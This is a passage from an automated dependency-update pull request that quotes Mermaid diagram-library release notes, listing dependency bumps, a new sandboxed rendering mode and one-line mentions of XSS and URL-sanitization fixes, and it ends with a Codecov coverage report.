27.5.0 to 27.5.1 ([#​2720](https://togithub.com/mermaid-js/mermaid/issues/2720)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump babel-loader from 8.2.3 to 8.2.4 ([#​2862](https://togithub.com/mermaid-js/mermaid/issues/2862)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump concurrently from 7.0.0 to 7.1.0 ([#​2889](https://togithub.com/mermaid-js/mermaid/issues/2889)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump cypress from 9.4.1 to 9.5.0 ([#​2762](https://togithub.com/mermaid-js/mermaid/issues/2762)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump cypress from 9.5.0 to 9.5.1 ([#​2800](https://togithub.com/mermaid-js/mermaid/issues/2800)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump cypress from 9.5.1 to 9.5.2 ([#​2837](https://togithub.com/mermaid-js/mermaid/issues/2837)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump cypress from 9.5.2 to 9.5.3 ([#​2890](https://togithub.com/mermaid-js/mermaid/issues/2890)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump eslint from 8.10.0 to 8.11.0 ([#​2821](https://togithub.com/mermaid-js/mermaid/issues/2821)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump eslint from 8.11.0 to 8.12.0 ([#​2867](https://togithub.com/mermaid-js/mermaid/issues/2867)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump eslint from 8.8.0 to 8.9.0 ([#​2713](https://togithub.com/mermaid-js/mermaid/issues/2713)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump eslint from 8.9.0 to 8.10.0 ([#​2783](https://togithub.com/mermaid-js/mermaid/issues/2783)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump eslint-config-prettier from 8.3.0 to 8.4.0 ([#​2761](https://togithub.com/mermaid-js/mermaid/issues/2761)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump eslint-config-prettier from 8.4.0 to 8.5.0 ([#​2798](https://togithub.com/mermaid-js/mermaid/issues/2798)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump eslint-plugin-jest from 26.1.0 to 26.1.1 ([#​2760](https://togithub.com/mermaid-js/mermaid/issues/2760)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump eslint-plugin-jest from 26.1.1 to 26.1.2 ([#​2841](https://togithub.com/mermaid-js/mermaid/issues/2841)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump eslint-plugin-jest from 26.1.2 to 26.1.3 ([#​2864](https://togithub.com/mermaid-js/mermaid/issues/2864)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump eslint-plugin-jsdoc from 37.7.1 to 37.9.1 ([#​2714](https://togithub.com/mermaid-js/mermaid/issues/2714)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump eslint-plugin-jsdoc from 37.9.1 to 37.9.4 ([#​2764](https://togithub.com/mermaid-js/mermaid/issues/2764)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump eslint-plugin-jsdoc from 37.9.4 to 37.9.7 ([#​2801](https://togithub.com/mermaid-js/mermaid/issues/2801)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump eslint-plugin-jsdoc from 37.9.7 to 38.0.3 ([#​2820](https://togithub.com/mermaid-js/mermaid/issues/2820)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump eslint-plugin-jsdoc from 38.0.3 to 38.0.6 ([#​2840](https://togithub.com/mermaid-js/mermaid/issues/2840)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump eslint-plugin-jsdoc from 38.0.6 to 38.1.1 ([#​2863](https://togithub.com/mermaid-js/mermaid/issues/2863)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump eslint-plugin-jsdoc from 38.1.1 to 38.1.6 ([#​2893](https://togithub.com/mermaid-js/mermaid/issues/2893)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump jest from 27.5.0 to 27.5.1 ([#​2717](https://togithub.com/mermaid-js/mermaid/issues/2717)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump lint-staged from 12.3.3 to 12.3.4 ([#​2721](https://togithub.com/mermaid-js/mermaid/issues/2721)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump lint-staged from 12.3.4 to 12.3.5 ([#​2799](https://togithub.com/mermaid-js/mermaid/issues/2799)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump lint-staged from 12.3.5 to 12.3.7 ([#​2839](https://togithub.com/mermaid-js/mermaid/issues/2839)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump moment from 2.29.1 to 2.29.2 ([#​2888](https://togithub.com/mermaid-js/mermaid/issues/2888)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump prettier from 2.5.1 to 2.6.0 ([#​2842](https://togithub.com/mermaid-js/mermaid/issues/2842)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump prettier from 2.6.0 to 2.6.1 ([#​2866](https://togithub.com/mermaid-js/mermaid/issues/2866)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump prettier from 2.6.1 to 2.6.2 ([#​2887](https://togithub.com/mermaid-js/mermaid/issues/2887)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump prettier-plugin-jsdoc from 0.3.30 to 0.3.31 ([#​2822](https://togithub.com/mermaid-js/mermaid/issues/2822)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump prettier-plugin-jsdoc from 0.3.31 to 0.3.33 ([#​2865](https://togithub.com/mermaid-js/mermaid/issues/2865)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump prettier-plugin-jsdoc from 0.3.33 to 0.3.36 ([#​2892](https://togithub.com/mermaid-js/mermaid/issues/2892)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump webpack from 5.68.0 to 5.69.1 ([#​2765](https://togithub.com/mermaid-js/mermaid/issues/2765)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump webpack from 5.69.1 to 5.70.0 ([#​2802](https://togithub.com/mermaid-js/mermaid/issues/2802)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump webpack from 5.70.0 to 5.71.0 ([#​2894](https://togithub.com/mermaid-js/mermaid/issues/2894)) [@​dependabot](https://togithub.com/dependabot) 🎉 **Thanks to all contributors helping with this release!** 🎉 ### [`v8.14.0`](https://togithub.com/mermaid-js/mermaid/releases/tag/8.14.0) [Compare Source](https://togithub.com/mermaid-js/mermaid/compare/8.13.10...8.14.0) ### Release Notes #### Main feature - Adding new more secure security level 'sandbox' where all rendering happens in a sandboxed iframe. The returned element in this mode is also an iframe with the svg as a base64 encoded url. ([#​2654](https://togithub.com/mermaid-js/mermaid/issues/2654)) #### Documentation updates - Documention updates in the main mardownfile in the repo adding mermaid diagrams instead of images of mermaid diagrams ([#​2676](https://togithub.com/mermaid-js/mermaid/issues/2676)) [@​knsv](https://togithub.com/knsv) - Reference mkdocs-mermaid2-plugin for MkDocs ([#​2702](https://togithub.com/mermaid-js/mermaid/issues/2702)) [@​jfuentescpp](https://togithub.com/jfuentescpp) - docs: update for re-ordering ([#​2704](https://togithub.com/mermaid-js/mermaid/issues/2704)) [@​arfanliaqat](https://togithub.com/arfanliaqat) - sync Chinese readme contents ([#​2656](https://togithub.com/mermaid-js/mermaid/issues/2656)) [@​lexmin0412](https://togithub.com/lexmin0412) #### Dependecy updates - Bump [@​babel/core](https://togithub.com/babel/core) from 7.16.7 to 7.16.12 ([#​2658](https://togithub.com/mermaid-js/mermaid/issues/2658)) [@​dependabot](https://togithub.com/dependabot) - Bump [@​babel/preset-env](https://togithub.com/babel/preset-env) from 7.16.8 to 7.16.11 ([#​2660](https://togithub.com/mermaid-js/mermaid/issues/2660)) [@​dependabot](https://togithub.com/dependabot) - Bump [@​commitlint/cli](https://togithub.com/commitlint/cli) from 16.0.2 to 16.1.0 ([#​2664](https://togithub.com/mermaid-js/mermaid/issues/2664)) [@​dependabot](https://togithub.com/dependabot) - Bump EndBug/add-and-commit from 7 to 8.0.1 ([#​2665](https://togithub.com/mermaid-js/mermaid/issues/2665)) [@​dependabot](https://togithub.com/dependabot) - Bump cached-path-relative from 1.0.2 to 1.1.0 ([#​2671](https://togithub.com/mermaid-js/mermaid/issues/2671)) [@​dependabot](https://togithub.com/dependabot) - Bump cypress from 9.2.1 to 9.3.1 ([#​2663](https://togithub.com/mermaid-js/mermaid/issues/2663)) [@​dependabot](https://togithub.com/dependabot) - Bump eslint-plugin-jsdoc from 37.6.1 to 37.6.3 ([#​2662](https://togithub.com/mermaid-js/mermaid/issues/2662)) [@​dependabot](https://togithub.com/dependabot) - Bump lint-staged from 12.1.7 to 12.3.1 ([#​2661](https://togithub.com/mermaid-js/mermaid/issues/2661)) [@​dependabot](https://togithub.com/dependabot) - Bump webpack from 5.66.0 to 5.67.0 ([#​2659](https://togithub.com/mermaid-js/mermaid/issues/2659)) [@​dependabot](https://togithub.com/dependabot) - chore(deps): bump dompurify from 2.3.4 to 2.3.5 ([#​2683](https://togithub.com/mermaid-js/mermaid/issues/2683)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump [@​babel/core](https://togithub.com/babel/core) from 7.16.12 to 7.17.0 ([#​2697](https://togithub.com/mermaid-js/mermaid/issues/2697)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump [@​babel/eslint-parser](https://togithub.com/babel/eslint-parser) from 7.16.5 to 7.17.0 ([#​2700](https://togithub.com/mermaid-js/mermaid/issues/2700)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump [@​babel/register](https://togithub.com/babel/register) from 7.16.9 to 7.17.0 ([#​2699](https://togithub.com/mermaid-js/mermaid/issues/2699)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump [@​percy/cli](https://togithub.com/percy/cli) from 1.0.0-beta.73 to 1.0.0-beta.74 ([#​2680](https://togithub.com/mermaid-js/mermaid/issues/2680)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump babel-jest from 27.4.6 to 27.5.0 ([#​2701](https://togithub.com/mermaid-js/mermaid/issues/2701)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump cypress from 9.3.1 to 9.4.1 ([#​2692](https://togithub.com/mermaid-js/mermaid/issues/2692)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump eslint from 8.7.0 to 8.8.0 ([#​2682](https://togithub.com/mermaid-js/mermaid/issues/2682)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump eslint-plugin-jest from 25.7.0 to 26.0.0 ([#​2679](https://togithub.com/mermaid-js/mermaid/issues/2679)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump eslint-plugin-jest from 26.0.0 to 26.1.0 ([#​2693](https://togithub.com/mermaid-js/mermaid/issues/2693)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump eslint-plugin-jsdoc from 37.6.3 to 37.7.0 ([#​2681](https://togithub.com/mermaid-js/mermaid/issues/2681)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump eslint-plugin-jsdoc from 37.7.0 to 37.7.1 ([#​2690](https://togithub.com/mermaid-js/mermaid/issues/2690)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump jest from 27.4.7 to 27.5.0 ([#​2696](https://togithub.com/mermaid-js/mermaid/issues/2696)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump lint-staged from 12.3.1 to 12.3.2 ([#​2684](https://togithub.com/mermaid-js/mermaid/issues/2684)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump lint-staged from 12.3.2 to 12.3.3 ([#​2691](https://togithub.com/mermaid-js/mermaid/issues/2691)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump terser-webpack-plugin from 5.3.0 to 5.3.1 ([#​2694](https://togithub.com/mermaid-js/mermaid/issues/2694)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump webpack from 5.67.0 to 5.68.0 ([#​2698](https://togithub.com/mermaid-js/mermaid/issues/2698)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump webpack-cli from 4.9.1 to 4.9.2 ([#​2678](https://togithub.com/mermaid-js/mermaid/issues/2678)) [@​dependabot](https://togithub.com/dependabot) - chore(deps-dev): bump webpack-dev-server from 4.7.3 to 4.7.4 ([#​2695](https://togithub.com/mermaid-js/mermaid/issues/2695)) [@​dependabot](https://togithub.com/dependabot) 🎉 **Thanks to all contributors helping with this release!** 🎉 ### [`v8.13.10`](https://togithub.com/mermaid-js/mermaid/releases/tag/8.13.10) [Compare Source](https://togithub.com/mermaid-js/mermaid/compare/8.13.9...8.13.10) ### Release Notes - 2646 Removes a possible way for a diagram author to trigger a JavaScript using in diagram code. ([#​2655](https://togithub.com/mermaid-js/mermaid/issues/2655)) [@​knsv](https://togithub.com/knsv) - Bump [@​babel/preset-env](https://togithub.com/babel/preset-env) from 7.16.7 to 7.16.8 ([#​2642](https://togithub.com/mermaid-js/mermaid/issues/2642)) [@​dependabot](https://togithub.com/dependabot) - Bump [@​babel/register](https://togithub.com/babel/register) from 7.16.7 to 7.16.9 ([#​2639](https://togithub.com/mermaid-js/mermaid/issues/2639)) [@​dependabot](https://togithub.com/dependabot) - Bump [@​percy/cli](https://togithub.com/percy/cli) from 1.0.0-beta.71 to 1.0.0-beta.73 ([#​2638](https://togithub.com/mermaid-js/mermaid/issues/2638)) [@​dependabot](https://togithub.com/dependabot) - Bump cypress from 9.2.0 to 9.2.1 ([#​2636](https://togithub.com/mermaid-js/mermaid/issues/2636)) [@​dependabot](https://togithub.com/dependabot) - Bump eslint from 8.6.0 to 8.7.0 ([#​2637](https://togithub.com/mermaid-js/mermaid/issues/2637)) [@​dependabot](https://togithub.com/dependabot) - Bump eslint-plugin-jest from 25.3.4 to 25.7.0 ([#​2640](https://togithub.com/mermaid-js/mermaid/issues/2640)) [@​dependabot](https://togithub.com/dependabot) - Bump webpack from 5.65.0 to 5.66.0 ([#​2635](https://togithub.com/mermaid-js/mermaid/issues/2635)) [@​dependabot](https://togithub.com/dependabot) - Bump webpack-dev-server from 4.7.2 to 4.7.3 ([#​2641](https://togithub.com/mermaid-js/mermaid/issues/2641)) [@​dependabot](https://togithub.com/dependabot) - Remove console.log from common.js ([#​2621](https://togithub.com/mermaid-js/mermaid/issues/2621)) [@​Billiam](https://togithub.com/Billiam) - docs: Update sequenceDiagram.md: remove a duplication ([#​2624](https://togithub.com/mermaid-js/mermaid/issues/2624)) [@​hiramekun](https://togithub.com/hiramekun) 🎉 **Thanks to all contributors helping with this release!** 🎉 ### [`v8.13.9`](https://togithub.com/mermaid-js/mermaid/releases/tag/8.13.9) [Compare Source](https://togithub.com/mermaid-js/mermaid/compare/8.13.8...8.13.9) ### Release Notes #### Changes to the functionality - chore: make husky hooks executable ([#​2594](https://togithub.com/mermaid-js/mermaid/issues/2594)) [@​Yash-Singh1](https://togithub.com/Yash-Singh1) - fix: bug [#​2346](https://togithub.com/mermaid-js/mermaid/issues/2346) "ER-attribute comments not work" ([#​2598](https://togithub.com/mermaid-js/mermaid/issues/2598)) [@​ebjornset](https://togithub.com/ebjornset) - fix: bug [#​2631](https://togithub.com/mermaid-js/mermaid/issues/2631) Fix for more robust rendering of gitGraph [@​knsv](https://togithub.com/knsv) - fix: bug [#​2632](https://togithub.com/mermaid-js/mermaid/issues/2632) Fix for XSS vulnerability in classDiagrams [@​knsv](https://togithub.com/knsv) #### Documentation changes - Add Notion to integrations.md ([#​2593](https://togithub.com/mermaid-js/mermaid/issues/2593)) [@​kale-stew](https://togithub.com/kale-stew) - Added Mermaid in open source docs to tutorial page ([#​2613](https://togithub.com/mermaid-js/mermaid/issues/2613)) [@​chrismetz09](https://togithub.com/chrismetz09) - Change "graph" to "flowchart" ([#​2612](https://togithub.com/mermaid-js/mermaid/issues/2612)) [@​Erhannis](https://togithub.com/Erhannis) - Fix documentation full examples ([#​2615](https://togithub.com/mermaid-js/mermaid/issues/2615)) [@​magmax](https://togithub.com/magmax) - Fix typo ([#​2614](https://togithub.com/mermaid-js/mermaid/issues/2614)) [@​meganemura](https://togithub.com/meganemura) - docs: fix broken image links in gantt.md ([#​2599](https://togithub.com/mermaid-js/mermaid/issues/2599)) [@​esphas](https://togithub.com/esphas) #### Dependency updates - Bump [@​babel/core](https://togithub.com/babel/core) from 7.16.5 to 7.16.7 ([#​2610](https://togithub.com/mermaid-js/mermaid/issues/2610)) [@​dependabot](https://togithub.com/dependabot) - Bump [@​babel/preset-env](https://togithub.com/babel/preset-env) from 7.16.5 to 7.16.7 ([#​2602](https://togithub.com/mermaid-js/mermaid/issues/2602)) [@​dependabot](https://togithub.com/dependabot) - Bump [@​babel/register](https://togithub.com/babel/register) from 7.16.5 to 7.16.7 ([#​2601](https://togithub.com/mermaid-js/mermaid/issues/2601)) [@​dependabot](https://togithub.com/dependabot) - Bump [@​commitlint/cli](https://togithub.com/commitlint/cli) from 16.0.0 to 16.0.1 ([#​2607](https://togithub.com/mermaid-js/mermaid/issues/2607)) [@​dependabot](https://togithub.com/dependabot) - Bump [@​commitlint/cli](https://togithub.com/commitlint/cli) from 16.0.1 to 16.0.2 ([#​2619](https://togithub.com/mermaid-js/mermaid/issues/2619)) [@​dependabot](https://togithub.com/dependabot) - Bump babel-jest from 27.4.5 to 27.4.6 ([#​2616](https://togithub.com/mermaid-js/mermaid/issues/2616)) [@​dependabot](https://togithub.com/dependabot) - Bump concurrently from 6.5.1 to 7.0.0 ([#​2603](https://togithub.com/mermaid-js/mermaid/issues/2603)) [@​dependabot](https://togithub.com/dependabot) - Bump eslint from 8.5.0 to 8.6.0 ([#​2608](https://togithub.com/mermaid-js/mermaid/issues/2608)) [@​dependabot](https://togithub.com/dependabot) - Bump eslint-plugin-jest from 25.3.0 to 25.3.4 ([#​2609](https://togithub.com/mermaid-js/mermaid/issues/2609)) [@​dependabot](https://togithub.com/dependabot) - Bump eslint-plugin-jsdoc from 37.4.0 to 37.5.0 ([#​2605](https://togithub.com/mermaid-js/mermaid/issues/2605)) [@​dependabot](https://togithub.com/dependabot) - Bump eslint-plugin-jsdoc from 37.5.0 to 37.6.1 ([#​2620](https://togithub.com/mermaid-js/mermaid/issues/2620)) [@​dependabot](https://togithub.com/dependabot) - Bump follow-redirects from 1.14.6 to 1.14.7 ([#​2625](https://togithub.com/mermaid-js/mermaid/issues/2625)) [@​dependabot](https://togithub.com/dependabot) - Bump jest from 27.4.5 to 27.4.7 ([#​2618](https://togithub.com/mermaid-js/mermaid/issues/2618)) [@​dependabot](https://togithub.com/dependabot) - Bump lint-staged from 12.1.4 to 12.1.5 ([#​2604](https://togithub.com/mermaid-js/mermaid/issues/2604)) [@​dependabot](https://togithub.com/dependabot) - Bump lint-staged from 12.1.5 to 12.1.7 ([#​2617](https://togithub.com/mermaid-js/mermaid/issues/2617)) [@​dependabot](https://togithub.com/dependabot) - Bump webpack-dev-server from 4.7.1 to 4.7.2 ([#​2606](https://togithub.com/mermaid-js/mermaid/issues/2606)) [@​dependabot](https://togithub.com/dependabot) 🎉 **Thanks to all contributors helping with this release!** 🎉 ### [`v8.13.8`](https://togithub.com/mermaid-js/mermaid/releases/tag/8.13.8) [Compare Source](https://togithub.com/mermaid-js/mermaid/compare/8.13.7...8.13.8) ### Release Notes - Fix for vulnerability with links from actors in sequence diagrams - Fix for insuffiucient url sanitization ([#​2596](https://togithub.com/mermaid-js/mermaid/issues/2596)) - Add Notion to integrations.md ([#​2593](https://togithub.com/mermaid-js/mermaid/issues/2593)) [@​kale-stew](https://togithub.com/kale-stew) - Update TiddlyWiki integrations ([#​2584](https://togithub.com/mermaid-js/mermaid/issues/2584)) [@​jasonmhoule](https://togithub.com/jasonmhoule) - Bump [@​commitlint/cli](https://togithub.com/commitlint/cli) from 15.0.0 to 16.0.0 ([#​2590](https://togithub.com/mermaid-js/mermaid/issues/2590)) [@​dependabot](https://togithub.com/dependabot) - Bump [@​commitlint/config-conventional](https://togithub.com/commitlint/config-conventional) from 15.0.0 to 16.0.0 ([#​2591](https://togithub.com/mermaid-js/mermaid/issues/2591)) [@​dependabot](https://togithub.com/dependabot) - Bump cypress from 9.1.1 to 9.2.0 ([#​2586](https://togithub.com/mermaid-js/mermaid/issues/2586)) [@​dependabot](https://togithub.com/dependabot) - Bump eslint-plugin-jsdoc from 37.3.0 to 37.4.0 ([#​2589](https://togithub.com/mermaid-js/mermaid/issues/2589)) [@​dependabot](https://togithub.com/dependabot) - Bump lint-staged from 12.1.3 to 12.1.4 ([#​2587](https://togithub.com/mermaid-js/mermaid/issues/2587)) [@​dependabot](https://togithub.com/dependabot) - Bump webpack-dev-server from 4.6.0 to 4.7.1 ([#​2588](https://togithub.com/mermaid-js/mermaid/issues/2588)) [@​dependabot](https://togithub.com/dependabot) - Bump [@​babel/core](https://togithub.com/babel/core) from 7.16.0 to 7.16.5 ([#​2575](https://togithub.com/mermaid-js/mermaid/issues/2575)) [@​dependabot](https://togithub.com/dependabot) - Bump [@​babel/eslint-parser](https://togithub.com/babel/eslint-parser) from 7.16.3 to 7.16.5 ([#​2579](https://togithub.com/mermaid-js/mermaid/issues/2579)) [@​dependabot](https://togithub.com/dependabot) - Bump [@​babel/preset-env](https://togithub.com/babel/preset-env) from 7.16.4 to 7.16.5 ([#​2576](https://togithub.com/mermaid-js/mermaid/issues/2576)) [@​dependabot](https://togithub.com/dependabot) - Bump [@​babel/register](https://togithub.com/babel/register) from 7.16.0 to 7.16.5 ([#​2569](https://togithub.com/mermaid-js/mermaid/issues/2569)) [@​dependabot](https://togithub.com/dependabot) - Bump babel-jest from 27.4.4 to 27.4.5 ([#​2571](https://togithub.com/mermaid-js/mermaid/issues/2571)) [@​dependabot](https://togithub.com/dependabot) - Bump concurrently from 6.4.0 to 6.5.1 ([#​2570](https://togithub.com/mermaid-js/mermaid/issues/2570)) [@​dependabot](https://togithub.com/dependabot) - Bump eslint from 8.4.1 to 8.5.0 ([#​2572](https://togithub.com/mermaid-js/mermaid/issues/2572)) [@​dependabot](https://togithub.com/dependabot) - Bump eslint-plugin-jsdoc from 37.2.0 to 37.3.0 ([#​2573](https://togithub.com/mermaid-js/mermaid/issues/2573)) [@​dependabot](https://togithub.com/dependabot) - Bump jest from 27.4.4 to 27.4.5 ([#​2578](https://togithub.com/mermaid-js/mermaid/issues/2578)) [@​dependabot](https://togithub.com/dependabot) - Bump lint-staged from 12.1.2 to 12.1.3 ([#​2577](https://togithub.com/mermaid-js/mermaid/issues/2577)) [@​dependabot](https://togithub.com/dependabot) - Bump terser-webpack-plugin from 5.2.5 to 5.3.0 ([#​2574](https://togithub.com/mermaid-js/mermaid/issues/2574)) [@​dependabot](https://togithub.com/dependabot) 🎉 **Thanks to all contributors helping with this release!** 🎉 ### [`v8.13.7`](https://togithub.com/mermaid-js/mermaid/releases/tag/8.13.7) [Compare Source](https://togithub.com/mermaid-js/mermaid/

[codecov[bot]]

Codecov Report

Base: 84.55% // Head: 84.55% // No change to project coverage :thumbsup:

Coverage data is based on head (a9a66a2) compared to base (b27ba01). Patch has no changes to coverable lines.

:exclamation: Current head a9a66a2 differs from pull request most recent head f5fd4b0. Consider uploading reports for the commit f5fd4b0 to get more accurate results

Additional details and impacted files

```diff @@ Coverage Diff @@ ## master #635 +/- ## ======================================= Coverage 84.55% 84.55% ======================================= Files 11 11 Lines 259 259 Branches 48 48 ======================================= Hits 219 219 Misses 6 6 Partials 34 34 ``` Help us with your feedback. Take ten seconds to tell us [how you rate us](https://about.codecov.io/nps?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Yuta+Hiroto). Have a feature suggestion? [Share it here.](https://app.codecov.io/gh/feedback/?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Yuta+Hiroto)

:umbrella: View full report at Codecov.
:loudspeaker: Do you have feedback about the report comment? Let us know in this issue.